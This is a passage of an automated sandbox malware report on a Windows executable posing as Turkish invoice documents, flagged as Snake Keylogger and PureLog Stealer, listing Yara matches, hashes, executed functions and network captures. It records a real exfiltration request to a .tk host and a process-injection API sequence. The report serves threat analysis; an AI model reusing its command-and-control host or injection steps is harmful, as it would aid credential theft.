2024-05-03 13:19:02 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
2024-05-03 13:19:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49725	104.21.27.85	443	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 13:19:04 UTC	79	OUT	GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
2024-05-03 13:19:43 UTC	741	IN	HTTP/1.1 522 Date: Fri, 03 May 2024 13:19:43 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NHUF79ryWUg4snsH4DsGmphHPAwyFvtCfUxce85%2FDrYDPtPJbVrH5tsh%2FZlpySiRJALW%2F9h2UmODIpJURq2wS4effqQCy47VLub%2FBO%2FPwkh0BL1HqOYVYGcRJI%2FWVlqlWOEJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 87e08a64fb7cc45e-EWR alt-svc: h3=":443"; ma=86400
2024-05-03 13:19:43 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

Target ID:	0
Start time:	15:18:50
Start date:	03/05/2024
Path:	C:\Users\user\Desktop\FATURA VE BELGELER..exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FATURA VE BELGELER..exe"
Imagebase:	0x6d0000
File size:	964'608 bytes
MD5 hash:	C62DA7A3EAC6BAE78EA8A771FAA65D17
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1990854679.0000000005400000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1988410714.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1988410714.0000000002D1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:18:51
Start date:	03/05/2024
Path:	C:\Users\user\Desktop\FATURA VE BELGELER..exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FATURA VE BELGELER..exe"
Imagebase:	0x600000
File size:	964'608 bytes
MD5 hash:	C62DA7A3EAC6BAE78EA8A771FAA65D17
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2%
Total number of Nodes:	539
Total number of Limit Nodes:	14

Executed Functions

Function 06CC44D8 Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

., xrefs: 06CC44BB

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: de035460c25e2ff71446d0303b60ef3012ba344f6ee527663b877dd2627b5d76
Instruction ID: 305052f0fefbf5776384e64cd44499d5b57d58bab0f7c480db544eeba7f910fa
Opcode Fuzzy Hash: de035460c25e2ff71446d0303b60ef3012ba344f6ee527663b877dd2627b5d76
Instruction Fuzzy Hash: 91410975E06508CFDB48DFAAD5546EEFBF2EF88310F24C06AD409A7255DB349942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05037018 Relevance: .9, Instructions: 947COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1990503958.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5030000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 555445e9b2b6528f7d58aede9ceda4bbc46ecf0ccd4b71afdc2c9a1bd71d11d4
Instruction ID: 0b1f0b8de3e1eb061d760479161dbae0a9cfd46c34af7f7b3fc96fe5ab068774
Opcode Fuzzy Hash: 555445e9b2b6528f7d58aede9ceda4bbc46ecf0ccd4b71afdc2c9a1bd71d11d4
Instruction Fuzzy Hash: A0A2BF34A40219CFDB24DF68C995AEDB7B2BF89300F1181E9D409AB765DB31AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05037008 Relevance: .8, Instructions: 809COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1990503958.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5030000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8463c9449987c733fa3298cb31fe8e78e9e2ede3541bdf874f628035767f6eeb
Instruction ID: 483664931947e3a91fc345d763c5a6a9d146f21a837a3d146aec4465dfcae9d6
Opcode Fuzzy Hash: 8463c9449987c733fa3298cb31fe8e78e9e2ede3541bdf874f628035767f6eeb
Instruction Fuzzy Hash: 8F82C234A40219CFDB24DF64C995BE9B7B2EF89300F1181E9D409AB765EB31AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04B211B8 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1990303500.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86b36bba2b639c156309779a8740f7390b7a5f185fac42181c726c436755f4e8
Instruction ID: b25382188663ed40ed53e1ffd0da27af804219d7371c44980008ffe40d1b79c4
Opcode Fuzzy Hash: 86b36bba2b639c156309779a8740f7390b7a5f185fac42181c726c436755f4e8
Instruction Fuzzy Hash: AE327B34B012149FEB19DB69D660BAEB7F6EF89304F1444A9E50ADB7A0CB34ED01CB51

Uniqueness

Uniqueness Score: -1.00%

Function 06CC44E8 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7125c5636b349c5337b4224520e8e442d746ddad5be24f8a566b615bba35bf41
Instruction ID: 5523800c536698e32e5a04cc7dc1df0d938dfe80cefe4c930018557a4b34e0e9
Opcode Fuzzy Hash: 7125c5636b349c5337b4224520e8e442d746ddad5be24f8a566b615bba35bf41
Instruction Fuzzy Hash: 0451E874E055198FCB48DF9AD5909AEFBF2FF88310F24C069D418A7255DB30A942CF90

Uniqueness

Uniqueness Score: -1.00%

Function 06CCDF5C Relevance: 1.8, APIs: 1, Instructions: 252
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CCE19E

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0759d1cd3711b782ac0a657865d7984f9742d539708a8990bf1eda33d80d6dd1
Instruction ID: 1dc2942026f2a90b7ec723915d34ca7661b93ee366666188b21e6a2f2d9592e8
Opcode Fuzzy Hash: 0759d1cd3711b782ac0a657865d7984f9742d539708a8990bf1eda33d80d6dd1
Instruction Fuzzy Hash: D6A17D71D00259CFEB64CFA8C8507EDBBB2BF49324F14856DD809A7240DB759A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06CCDF68 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CCE19E

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 563d04716b912d3f9386d51d8dc14f189984d588f65ba44a864bb904fa94bdc5
Instruction ID: d98e89aba7241f632cdf599bf4b8253c168a2841f2ced12a80d3ceff1e8d8727
Opcode Fuzzy Hash: 563d04716b912d3f9386d51d8dc14f189984d588f65ba44a864bb904fa94bdc5
Instruction Fuzzy Hash: BD917C71D00259CFEB64CFA8C851BEDBBB2BF49310F04856ED809A7240DB759A85CF92

Uniqueness

Uniqueness Score: -1.00%

Function 028AAE90 Relevance: 1.7, APIs: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 028AB0E6

Memory Dump Source

Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0586e6af699283abfc4498e6fb52df421de20505eb86810a87491445f27b37aa
Instruction ID: d6c2880508aa69a75d71c562738c03660a3404fb2814c5a3f4c83f0eb1a5cfc7
Opcode Fuzzy Hash: 0586e6af699283abfc4498e6fb52df421de20505eb86810a87491445f27b37aa
Instruction Fuzzy Hash: 91714978A00B058FEB28DF29D45475ABBF5FF48704F00892DD48AD7A50DB75E84ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 05030BFC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05034381

Memory Dump Source

Source File: 00000000.00000002.1990503958.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5030000_FATURA VE BELGELER.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: d0aafca92ecd7601f47ad84f7e367f430cc62c2a8912ff1fe53b78f105ed494e
Instruction ID: 346f2b8398d4068eee0fc1324b5faa9867dcbd6164fe4a804f1bd0361fd1603b
Opcode Fuzzy Hash: d0aafca92ecd7601f47ad84f7e367f430cc62c2a8912ff1fe53b78f105ed494e
Instruction Fuzzy Hash: 3B4129B49003099FDB14CF99D489AAEFBF9FF89314F248459D519AB321C374A845CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 028A449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028A59C9

Memory Dump Source

Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 27c1e9d0f961adfc1c3cd08ec27de7dfd4ba63c91ba72427dcfbd957e740126a
Instruction ID: 8797516aaf36c98187b85f3c0deb16142895013c198d03647d14f93247c2efad
Opcode Fuzzy Hash: 27c1e9d0f961adfc1c3cd08ec27de7dfd4ba63c91ba72427dcfbd957e740126a
Instruction Fuzzy Hash: 1B4115B4C0071DCBEB24CFA9C884BDDBBB5BF49304F20805AD409AB250DB75694ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 028A590C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028A59C9

Memory Dump Source

Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 083f5a3167e31065306b7589f570e136cbc4285212b0bdb1e025beecba577798
Instruction ID: b3ed488cf03683ef4375de2b1ccaee7b7903c1dd9ef5aee07c2da69e39ee8154
Opcode Fuzzy Hash: 083f5a3167e31065306b7589f570e136cbc4285212b0bdb1e025beecba577798
Instruction Fuzzy Hash: F34123B4D00719CFEB24CFA9C9947CDBBB1BF49304F20805AD409AB250DB75698ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 028AD421 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028AD326,?,?,?,?,?), ref: 028AD3E7

Memory Dump Source

Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: efd87fa9a8af45dcc1b5a9360745a6159854795fddb7a150241c9c600a57ff03
Instruction ID: 6083f101735e057756d29509d5c3ed0a1d8024610145d5aaf1f8ab3a2d3c2835
Opcode Fuzzy Hash: efd87fa9a8af45dcc1b5a9360745a6159854795fddb7a150241c9c600a57ff03
Instruction Fuzzy Hash: 39318478A813448FE3059F70F4547693BA6F7C4711F60893AE9658B3D9EBB84866CB20

Uniqueness

Uniqueness Score: -1.00%

Function 06CCDCD8 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CCDD70

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: baf6c33344bb9a40b779b222f85fa058e2bba467793c6ddcd1799d3406b36cf1
Instruction ID: 86ff2261a8d2bc9694ea7ac2da36237717b0a9c4c3bc28e25b788b0342e22a57
Opcode Fuzzy Hash: baf6c33344bb9a40b779b222f85fa058e2bba467793c6ddcd1799d3406b36cf1
Instruction Fuzzy Hash: AB2127B5D002499FDB10DFA9C885BEEBBF5FF48324F10842AE559A7240C778A545CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06CCDCE0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CCDD70

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3dfde120177aa398cbcaa32e87c97aec39db85483536b8167a4b7499239eae4e
Instruction ID: b9d6877210072f275cd382e9b2d0bfbde612aa0aef06705db8bb353c62844944
Opcode Fuzzy Hash: 3dfde120177aa398cbcaa32e87c97aec39db85483536b8167a4b7499239eae4e
Instruction Fuzzy Hash: 2421F7B5D002499FCB10DFA9C885BDEBBF5FF48310F508429E519A7250C778A545CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 028ACA00 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028AD326,?,?,?,?,?), ref: 028AD3E7

Memory Dump Source

Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: acc09241762c3215485ac3afadb19ef0752af69cb2536aacb289ed64a3cb4697
Instruction ID: 7e99bfbea33b04076ce79ac52dfb28776b6647be1802ee2c28a6cbb1d860e307
Opcode Fuzzy Hash: acc09241762c3215485ac3afadb19ef0752af69cb2536aacb289ed64a3cb4697
Instruction Fuzzy Hash: 5621E3B990024C9FDB10CF9AD584AEEBBF8FB48310F14801AE918E7350D779A954CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 028AD358 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028AD326,?,?,?,?,?), ref: 028AD3E7

Memory Dump Source

Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3e724d49e850f57832f650c1060c64f8f9d9ce1330ff1336fd10ffaebb97f87b
Instruction ID: 12713f6341dee23281edf63661465a3dfa41554e9f565cbd8600f5f8443bcd97
Opcode Fuzzy Hash: 3e724d49e850f57832f650c1060c64f8f9d9ce1330ff1336fd10ffaebb97f87b
Instruction Fuzzy Hash: 712112B59002089FDB10CFAAD984AEEBFF4FB48310F14801AE918A7350D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06CCDB40 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CCDBC6

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: bbeae706cdca8554bcbf3f1256e59a647d983fb5236112a0a82b5636d64a98c9
Instruction ID: 2cca6b6981010a56640fecd4d69e49d1a84983c3640921a0dbb6900c34c85ac4
Opcode Fuzzy Hash: bbeae706cdca8554bcbf3f1256e59a647d983fb5236112a0a82b5636d64a98c9
Instruction Fuzzy Hash: DE2139B5D002498FDB10DFAAC4857EEBBF4EF89324F14842DD519A7241C778A585CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06CCDDC8 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CCDE50

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 612b9c4ba814f45d750693fae7f6c27257a14338b677ee365ac235aeaa3c48bd
Instruction ID: cac8a42a2505e62ff1e72393af7084b90899ca0eefea86532a9d4e9f3114d0c7
Opcode Fuzzy Hash: 612b9c4ba814f45d750693fae7f6c27257a14338b677ee365ac235aeaa3c48bd
Instruction Fuzzy Hash: 5C2119B1C002499FDB10DFAAC8806EEFBF5FF48310F50842EE559A7250C7789945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06CCDDD0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CCDE50

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e815b62f34f233d359180f8f73155adc72b2f3d3bf865b20505ac1ebae356d38
Instruction ID: 3a010abea37a75844320d6465ac35a204a34450bdf2e5219059cb90f9f91dd1d
Opcode Fuzzy Hash: e815b62f34f233d359180f8f73155adc72b2f3d3bf865b20505ac1ebae356d38
Instruction Fuzzy Hash: 9F21F8B1C002499FCB10DFAAC885AEEFBF5FF48310F50842EE519A7250D779A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06CCDB48 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CCDBC6

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9177d14f7586eee6d105cdf09c0be45d711a103d8e200143468191e00046fdc4
Instruction ID: 09e3ff651b4bf9e965c365b0c8e1353035949a3aaf27e087cdcc3b0765cab97d
Opcode Fuzzy Hash: 9177d14f7586eee6d105cdf09c0be45d711a103d8e200143468191e00046fdc4
Instruction Fuzzy Hash: 6E2118B5D002098FDB10DFAAC4857EEBBF4EF88324F54842ED519A7240CB78A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 028AB301 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,028AB161,00000800,00000000,00000000), ref: 028AB372

Memory Dump Source

Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: de0c07b985bb862b6a402d7f8db4d01e9bcfea66dd228867bfd5060b9440ca1e
Instruction ID: 77e87f5d80fc619d035a21c9e062a1824011f96c7102a42a6d98b0cee1d12c70
Opcode Fuzzy Hash: de0c07b985bb862b6a402d7f8db4d01e9bcfea66dd228867bfd5060b9440ca1e
Instruction Fuzzy Hash: CC1126BA9003498FDB10CFAAD884ADEFBF4EB58314F14852AD519A7200C779A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 028AA8D0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,028AB161,00000800,00000000,00000000), ref: 028AB372

Memory Dump Source

Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2f6da20457b269583adda7bf34a009de969d27225067a51ba89145b55e31c6a8
Instruction ID: 4311ba6b8fbc28a1b86560efc62c254fff42eec36caf3fc39ff2de01c3142924
Opcode Fuzzy Hash: 2f6da20457b269583adda7bf34a009de969d27225067a51ba89145b55e31c6a8
Instruction Fuzzy Hash: 501153BA8003489FDB10CF9AC444ADEFBF4EF58318F14812AE519A7200C7B9A545CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06CCDC19 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CCDC8E

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 74d82cd0f31dac4f642e02a4273f0856b886dfe4c4b352b6410f2a99aa0b1f93
Instruction ID: 9093f892680f1db5118162ccebc65234c3d0f7de4b5488b3a0cf961e7f9507bc
Opcode Fuzzy Hash: 74d82cd0f31dac4f642e02a4273f0856b886dfe4c4b352b6410f2a99aa0b1f93
Instruction Fuzzy Hash: 291137758002499FCB10DFAAD844AEEFFF5EF88324F24881DE519A7250C77AA545CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06CCDC20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CCDC8E

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f7dbd26b4a2855020c072778d2208d8b91cfa61d757c7a2e0d83a7e7d7d6ba72
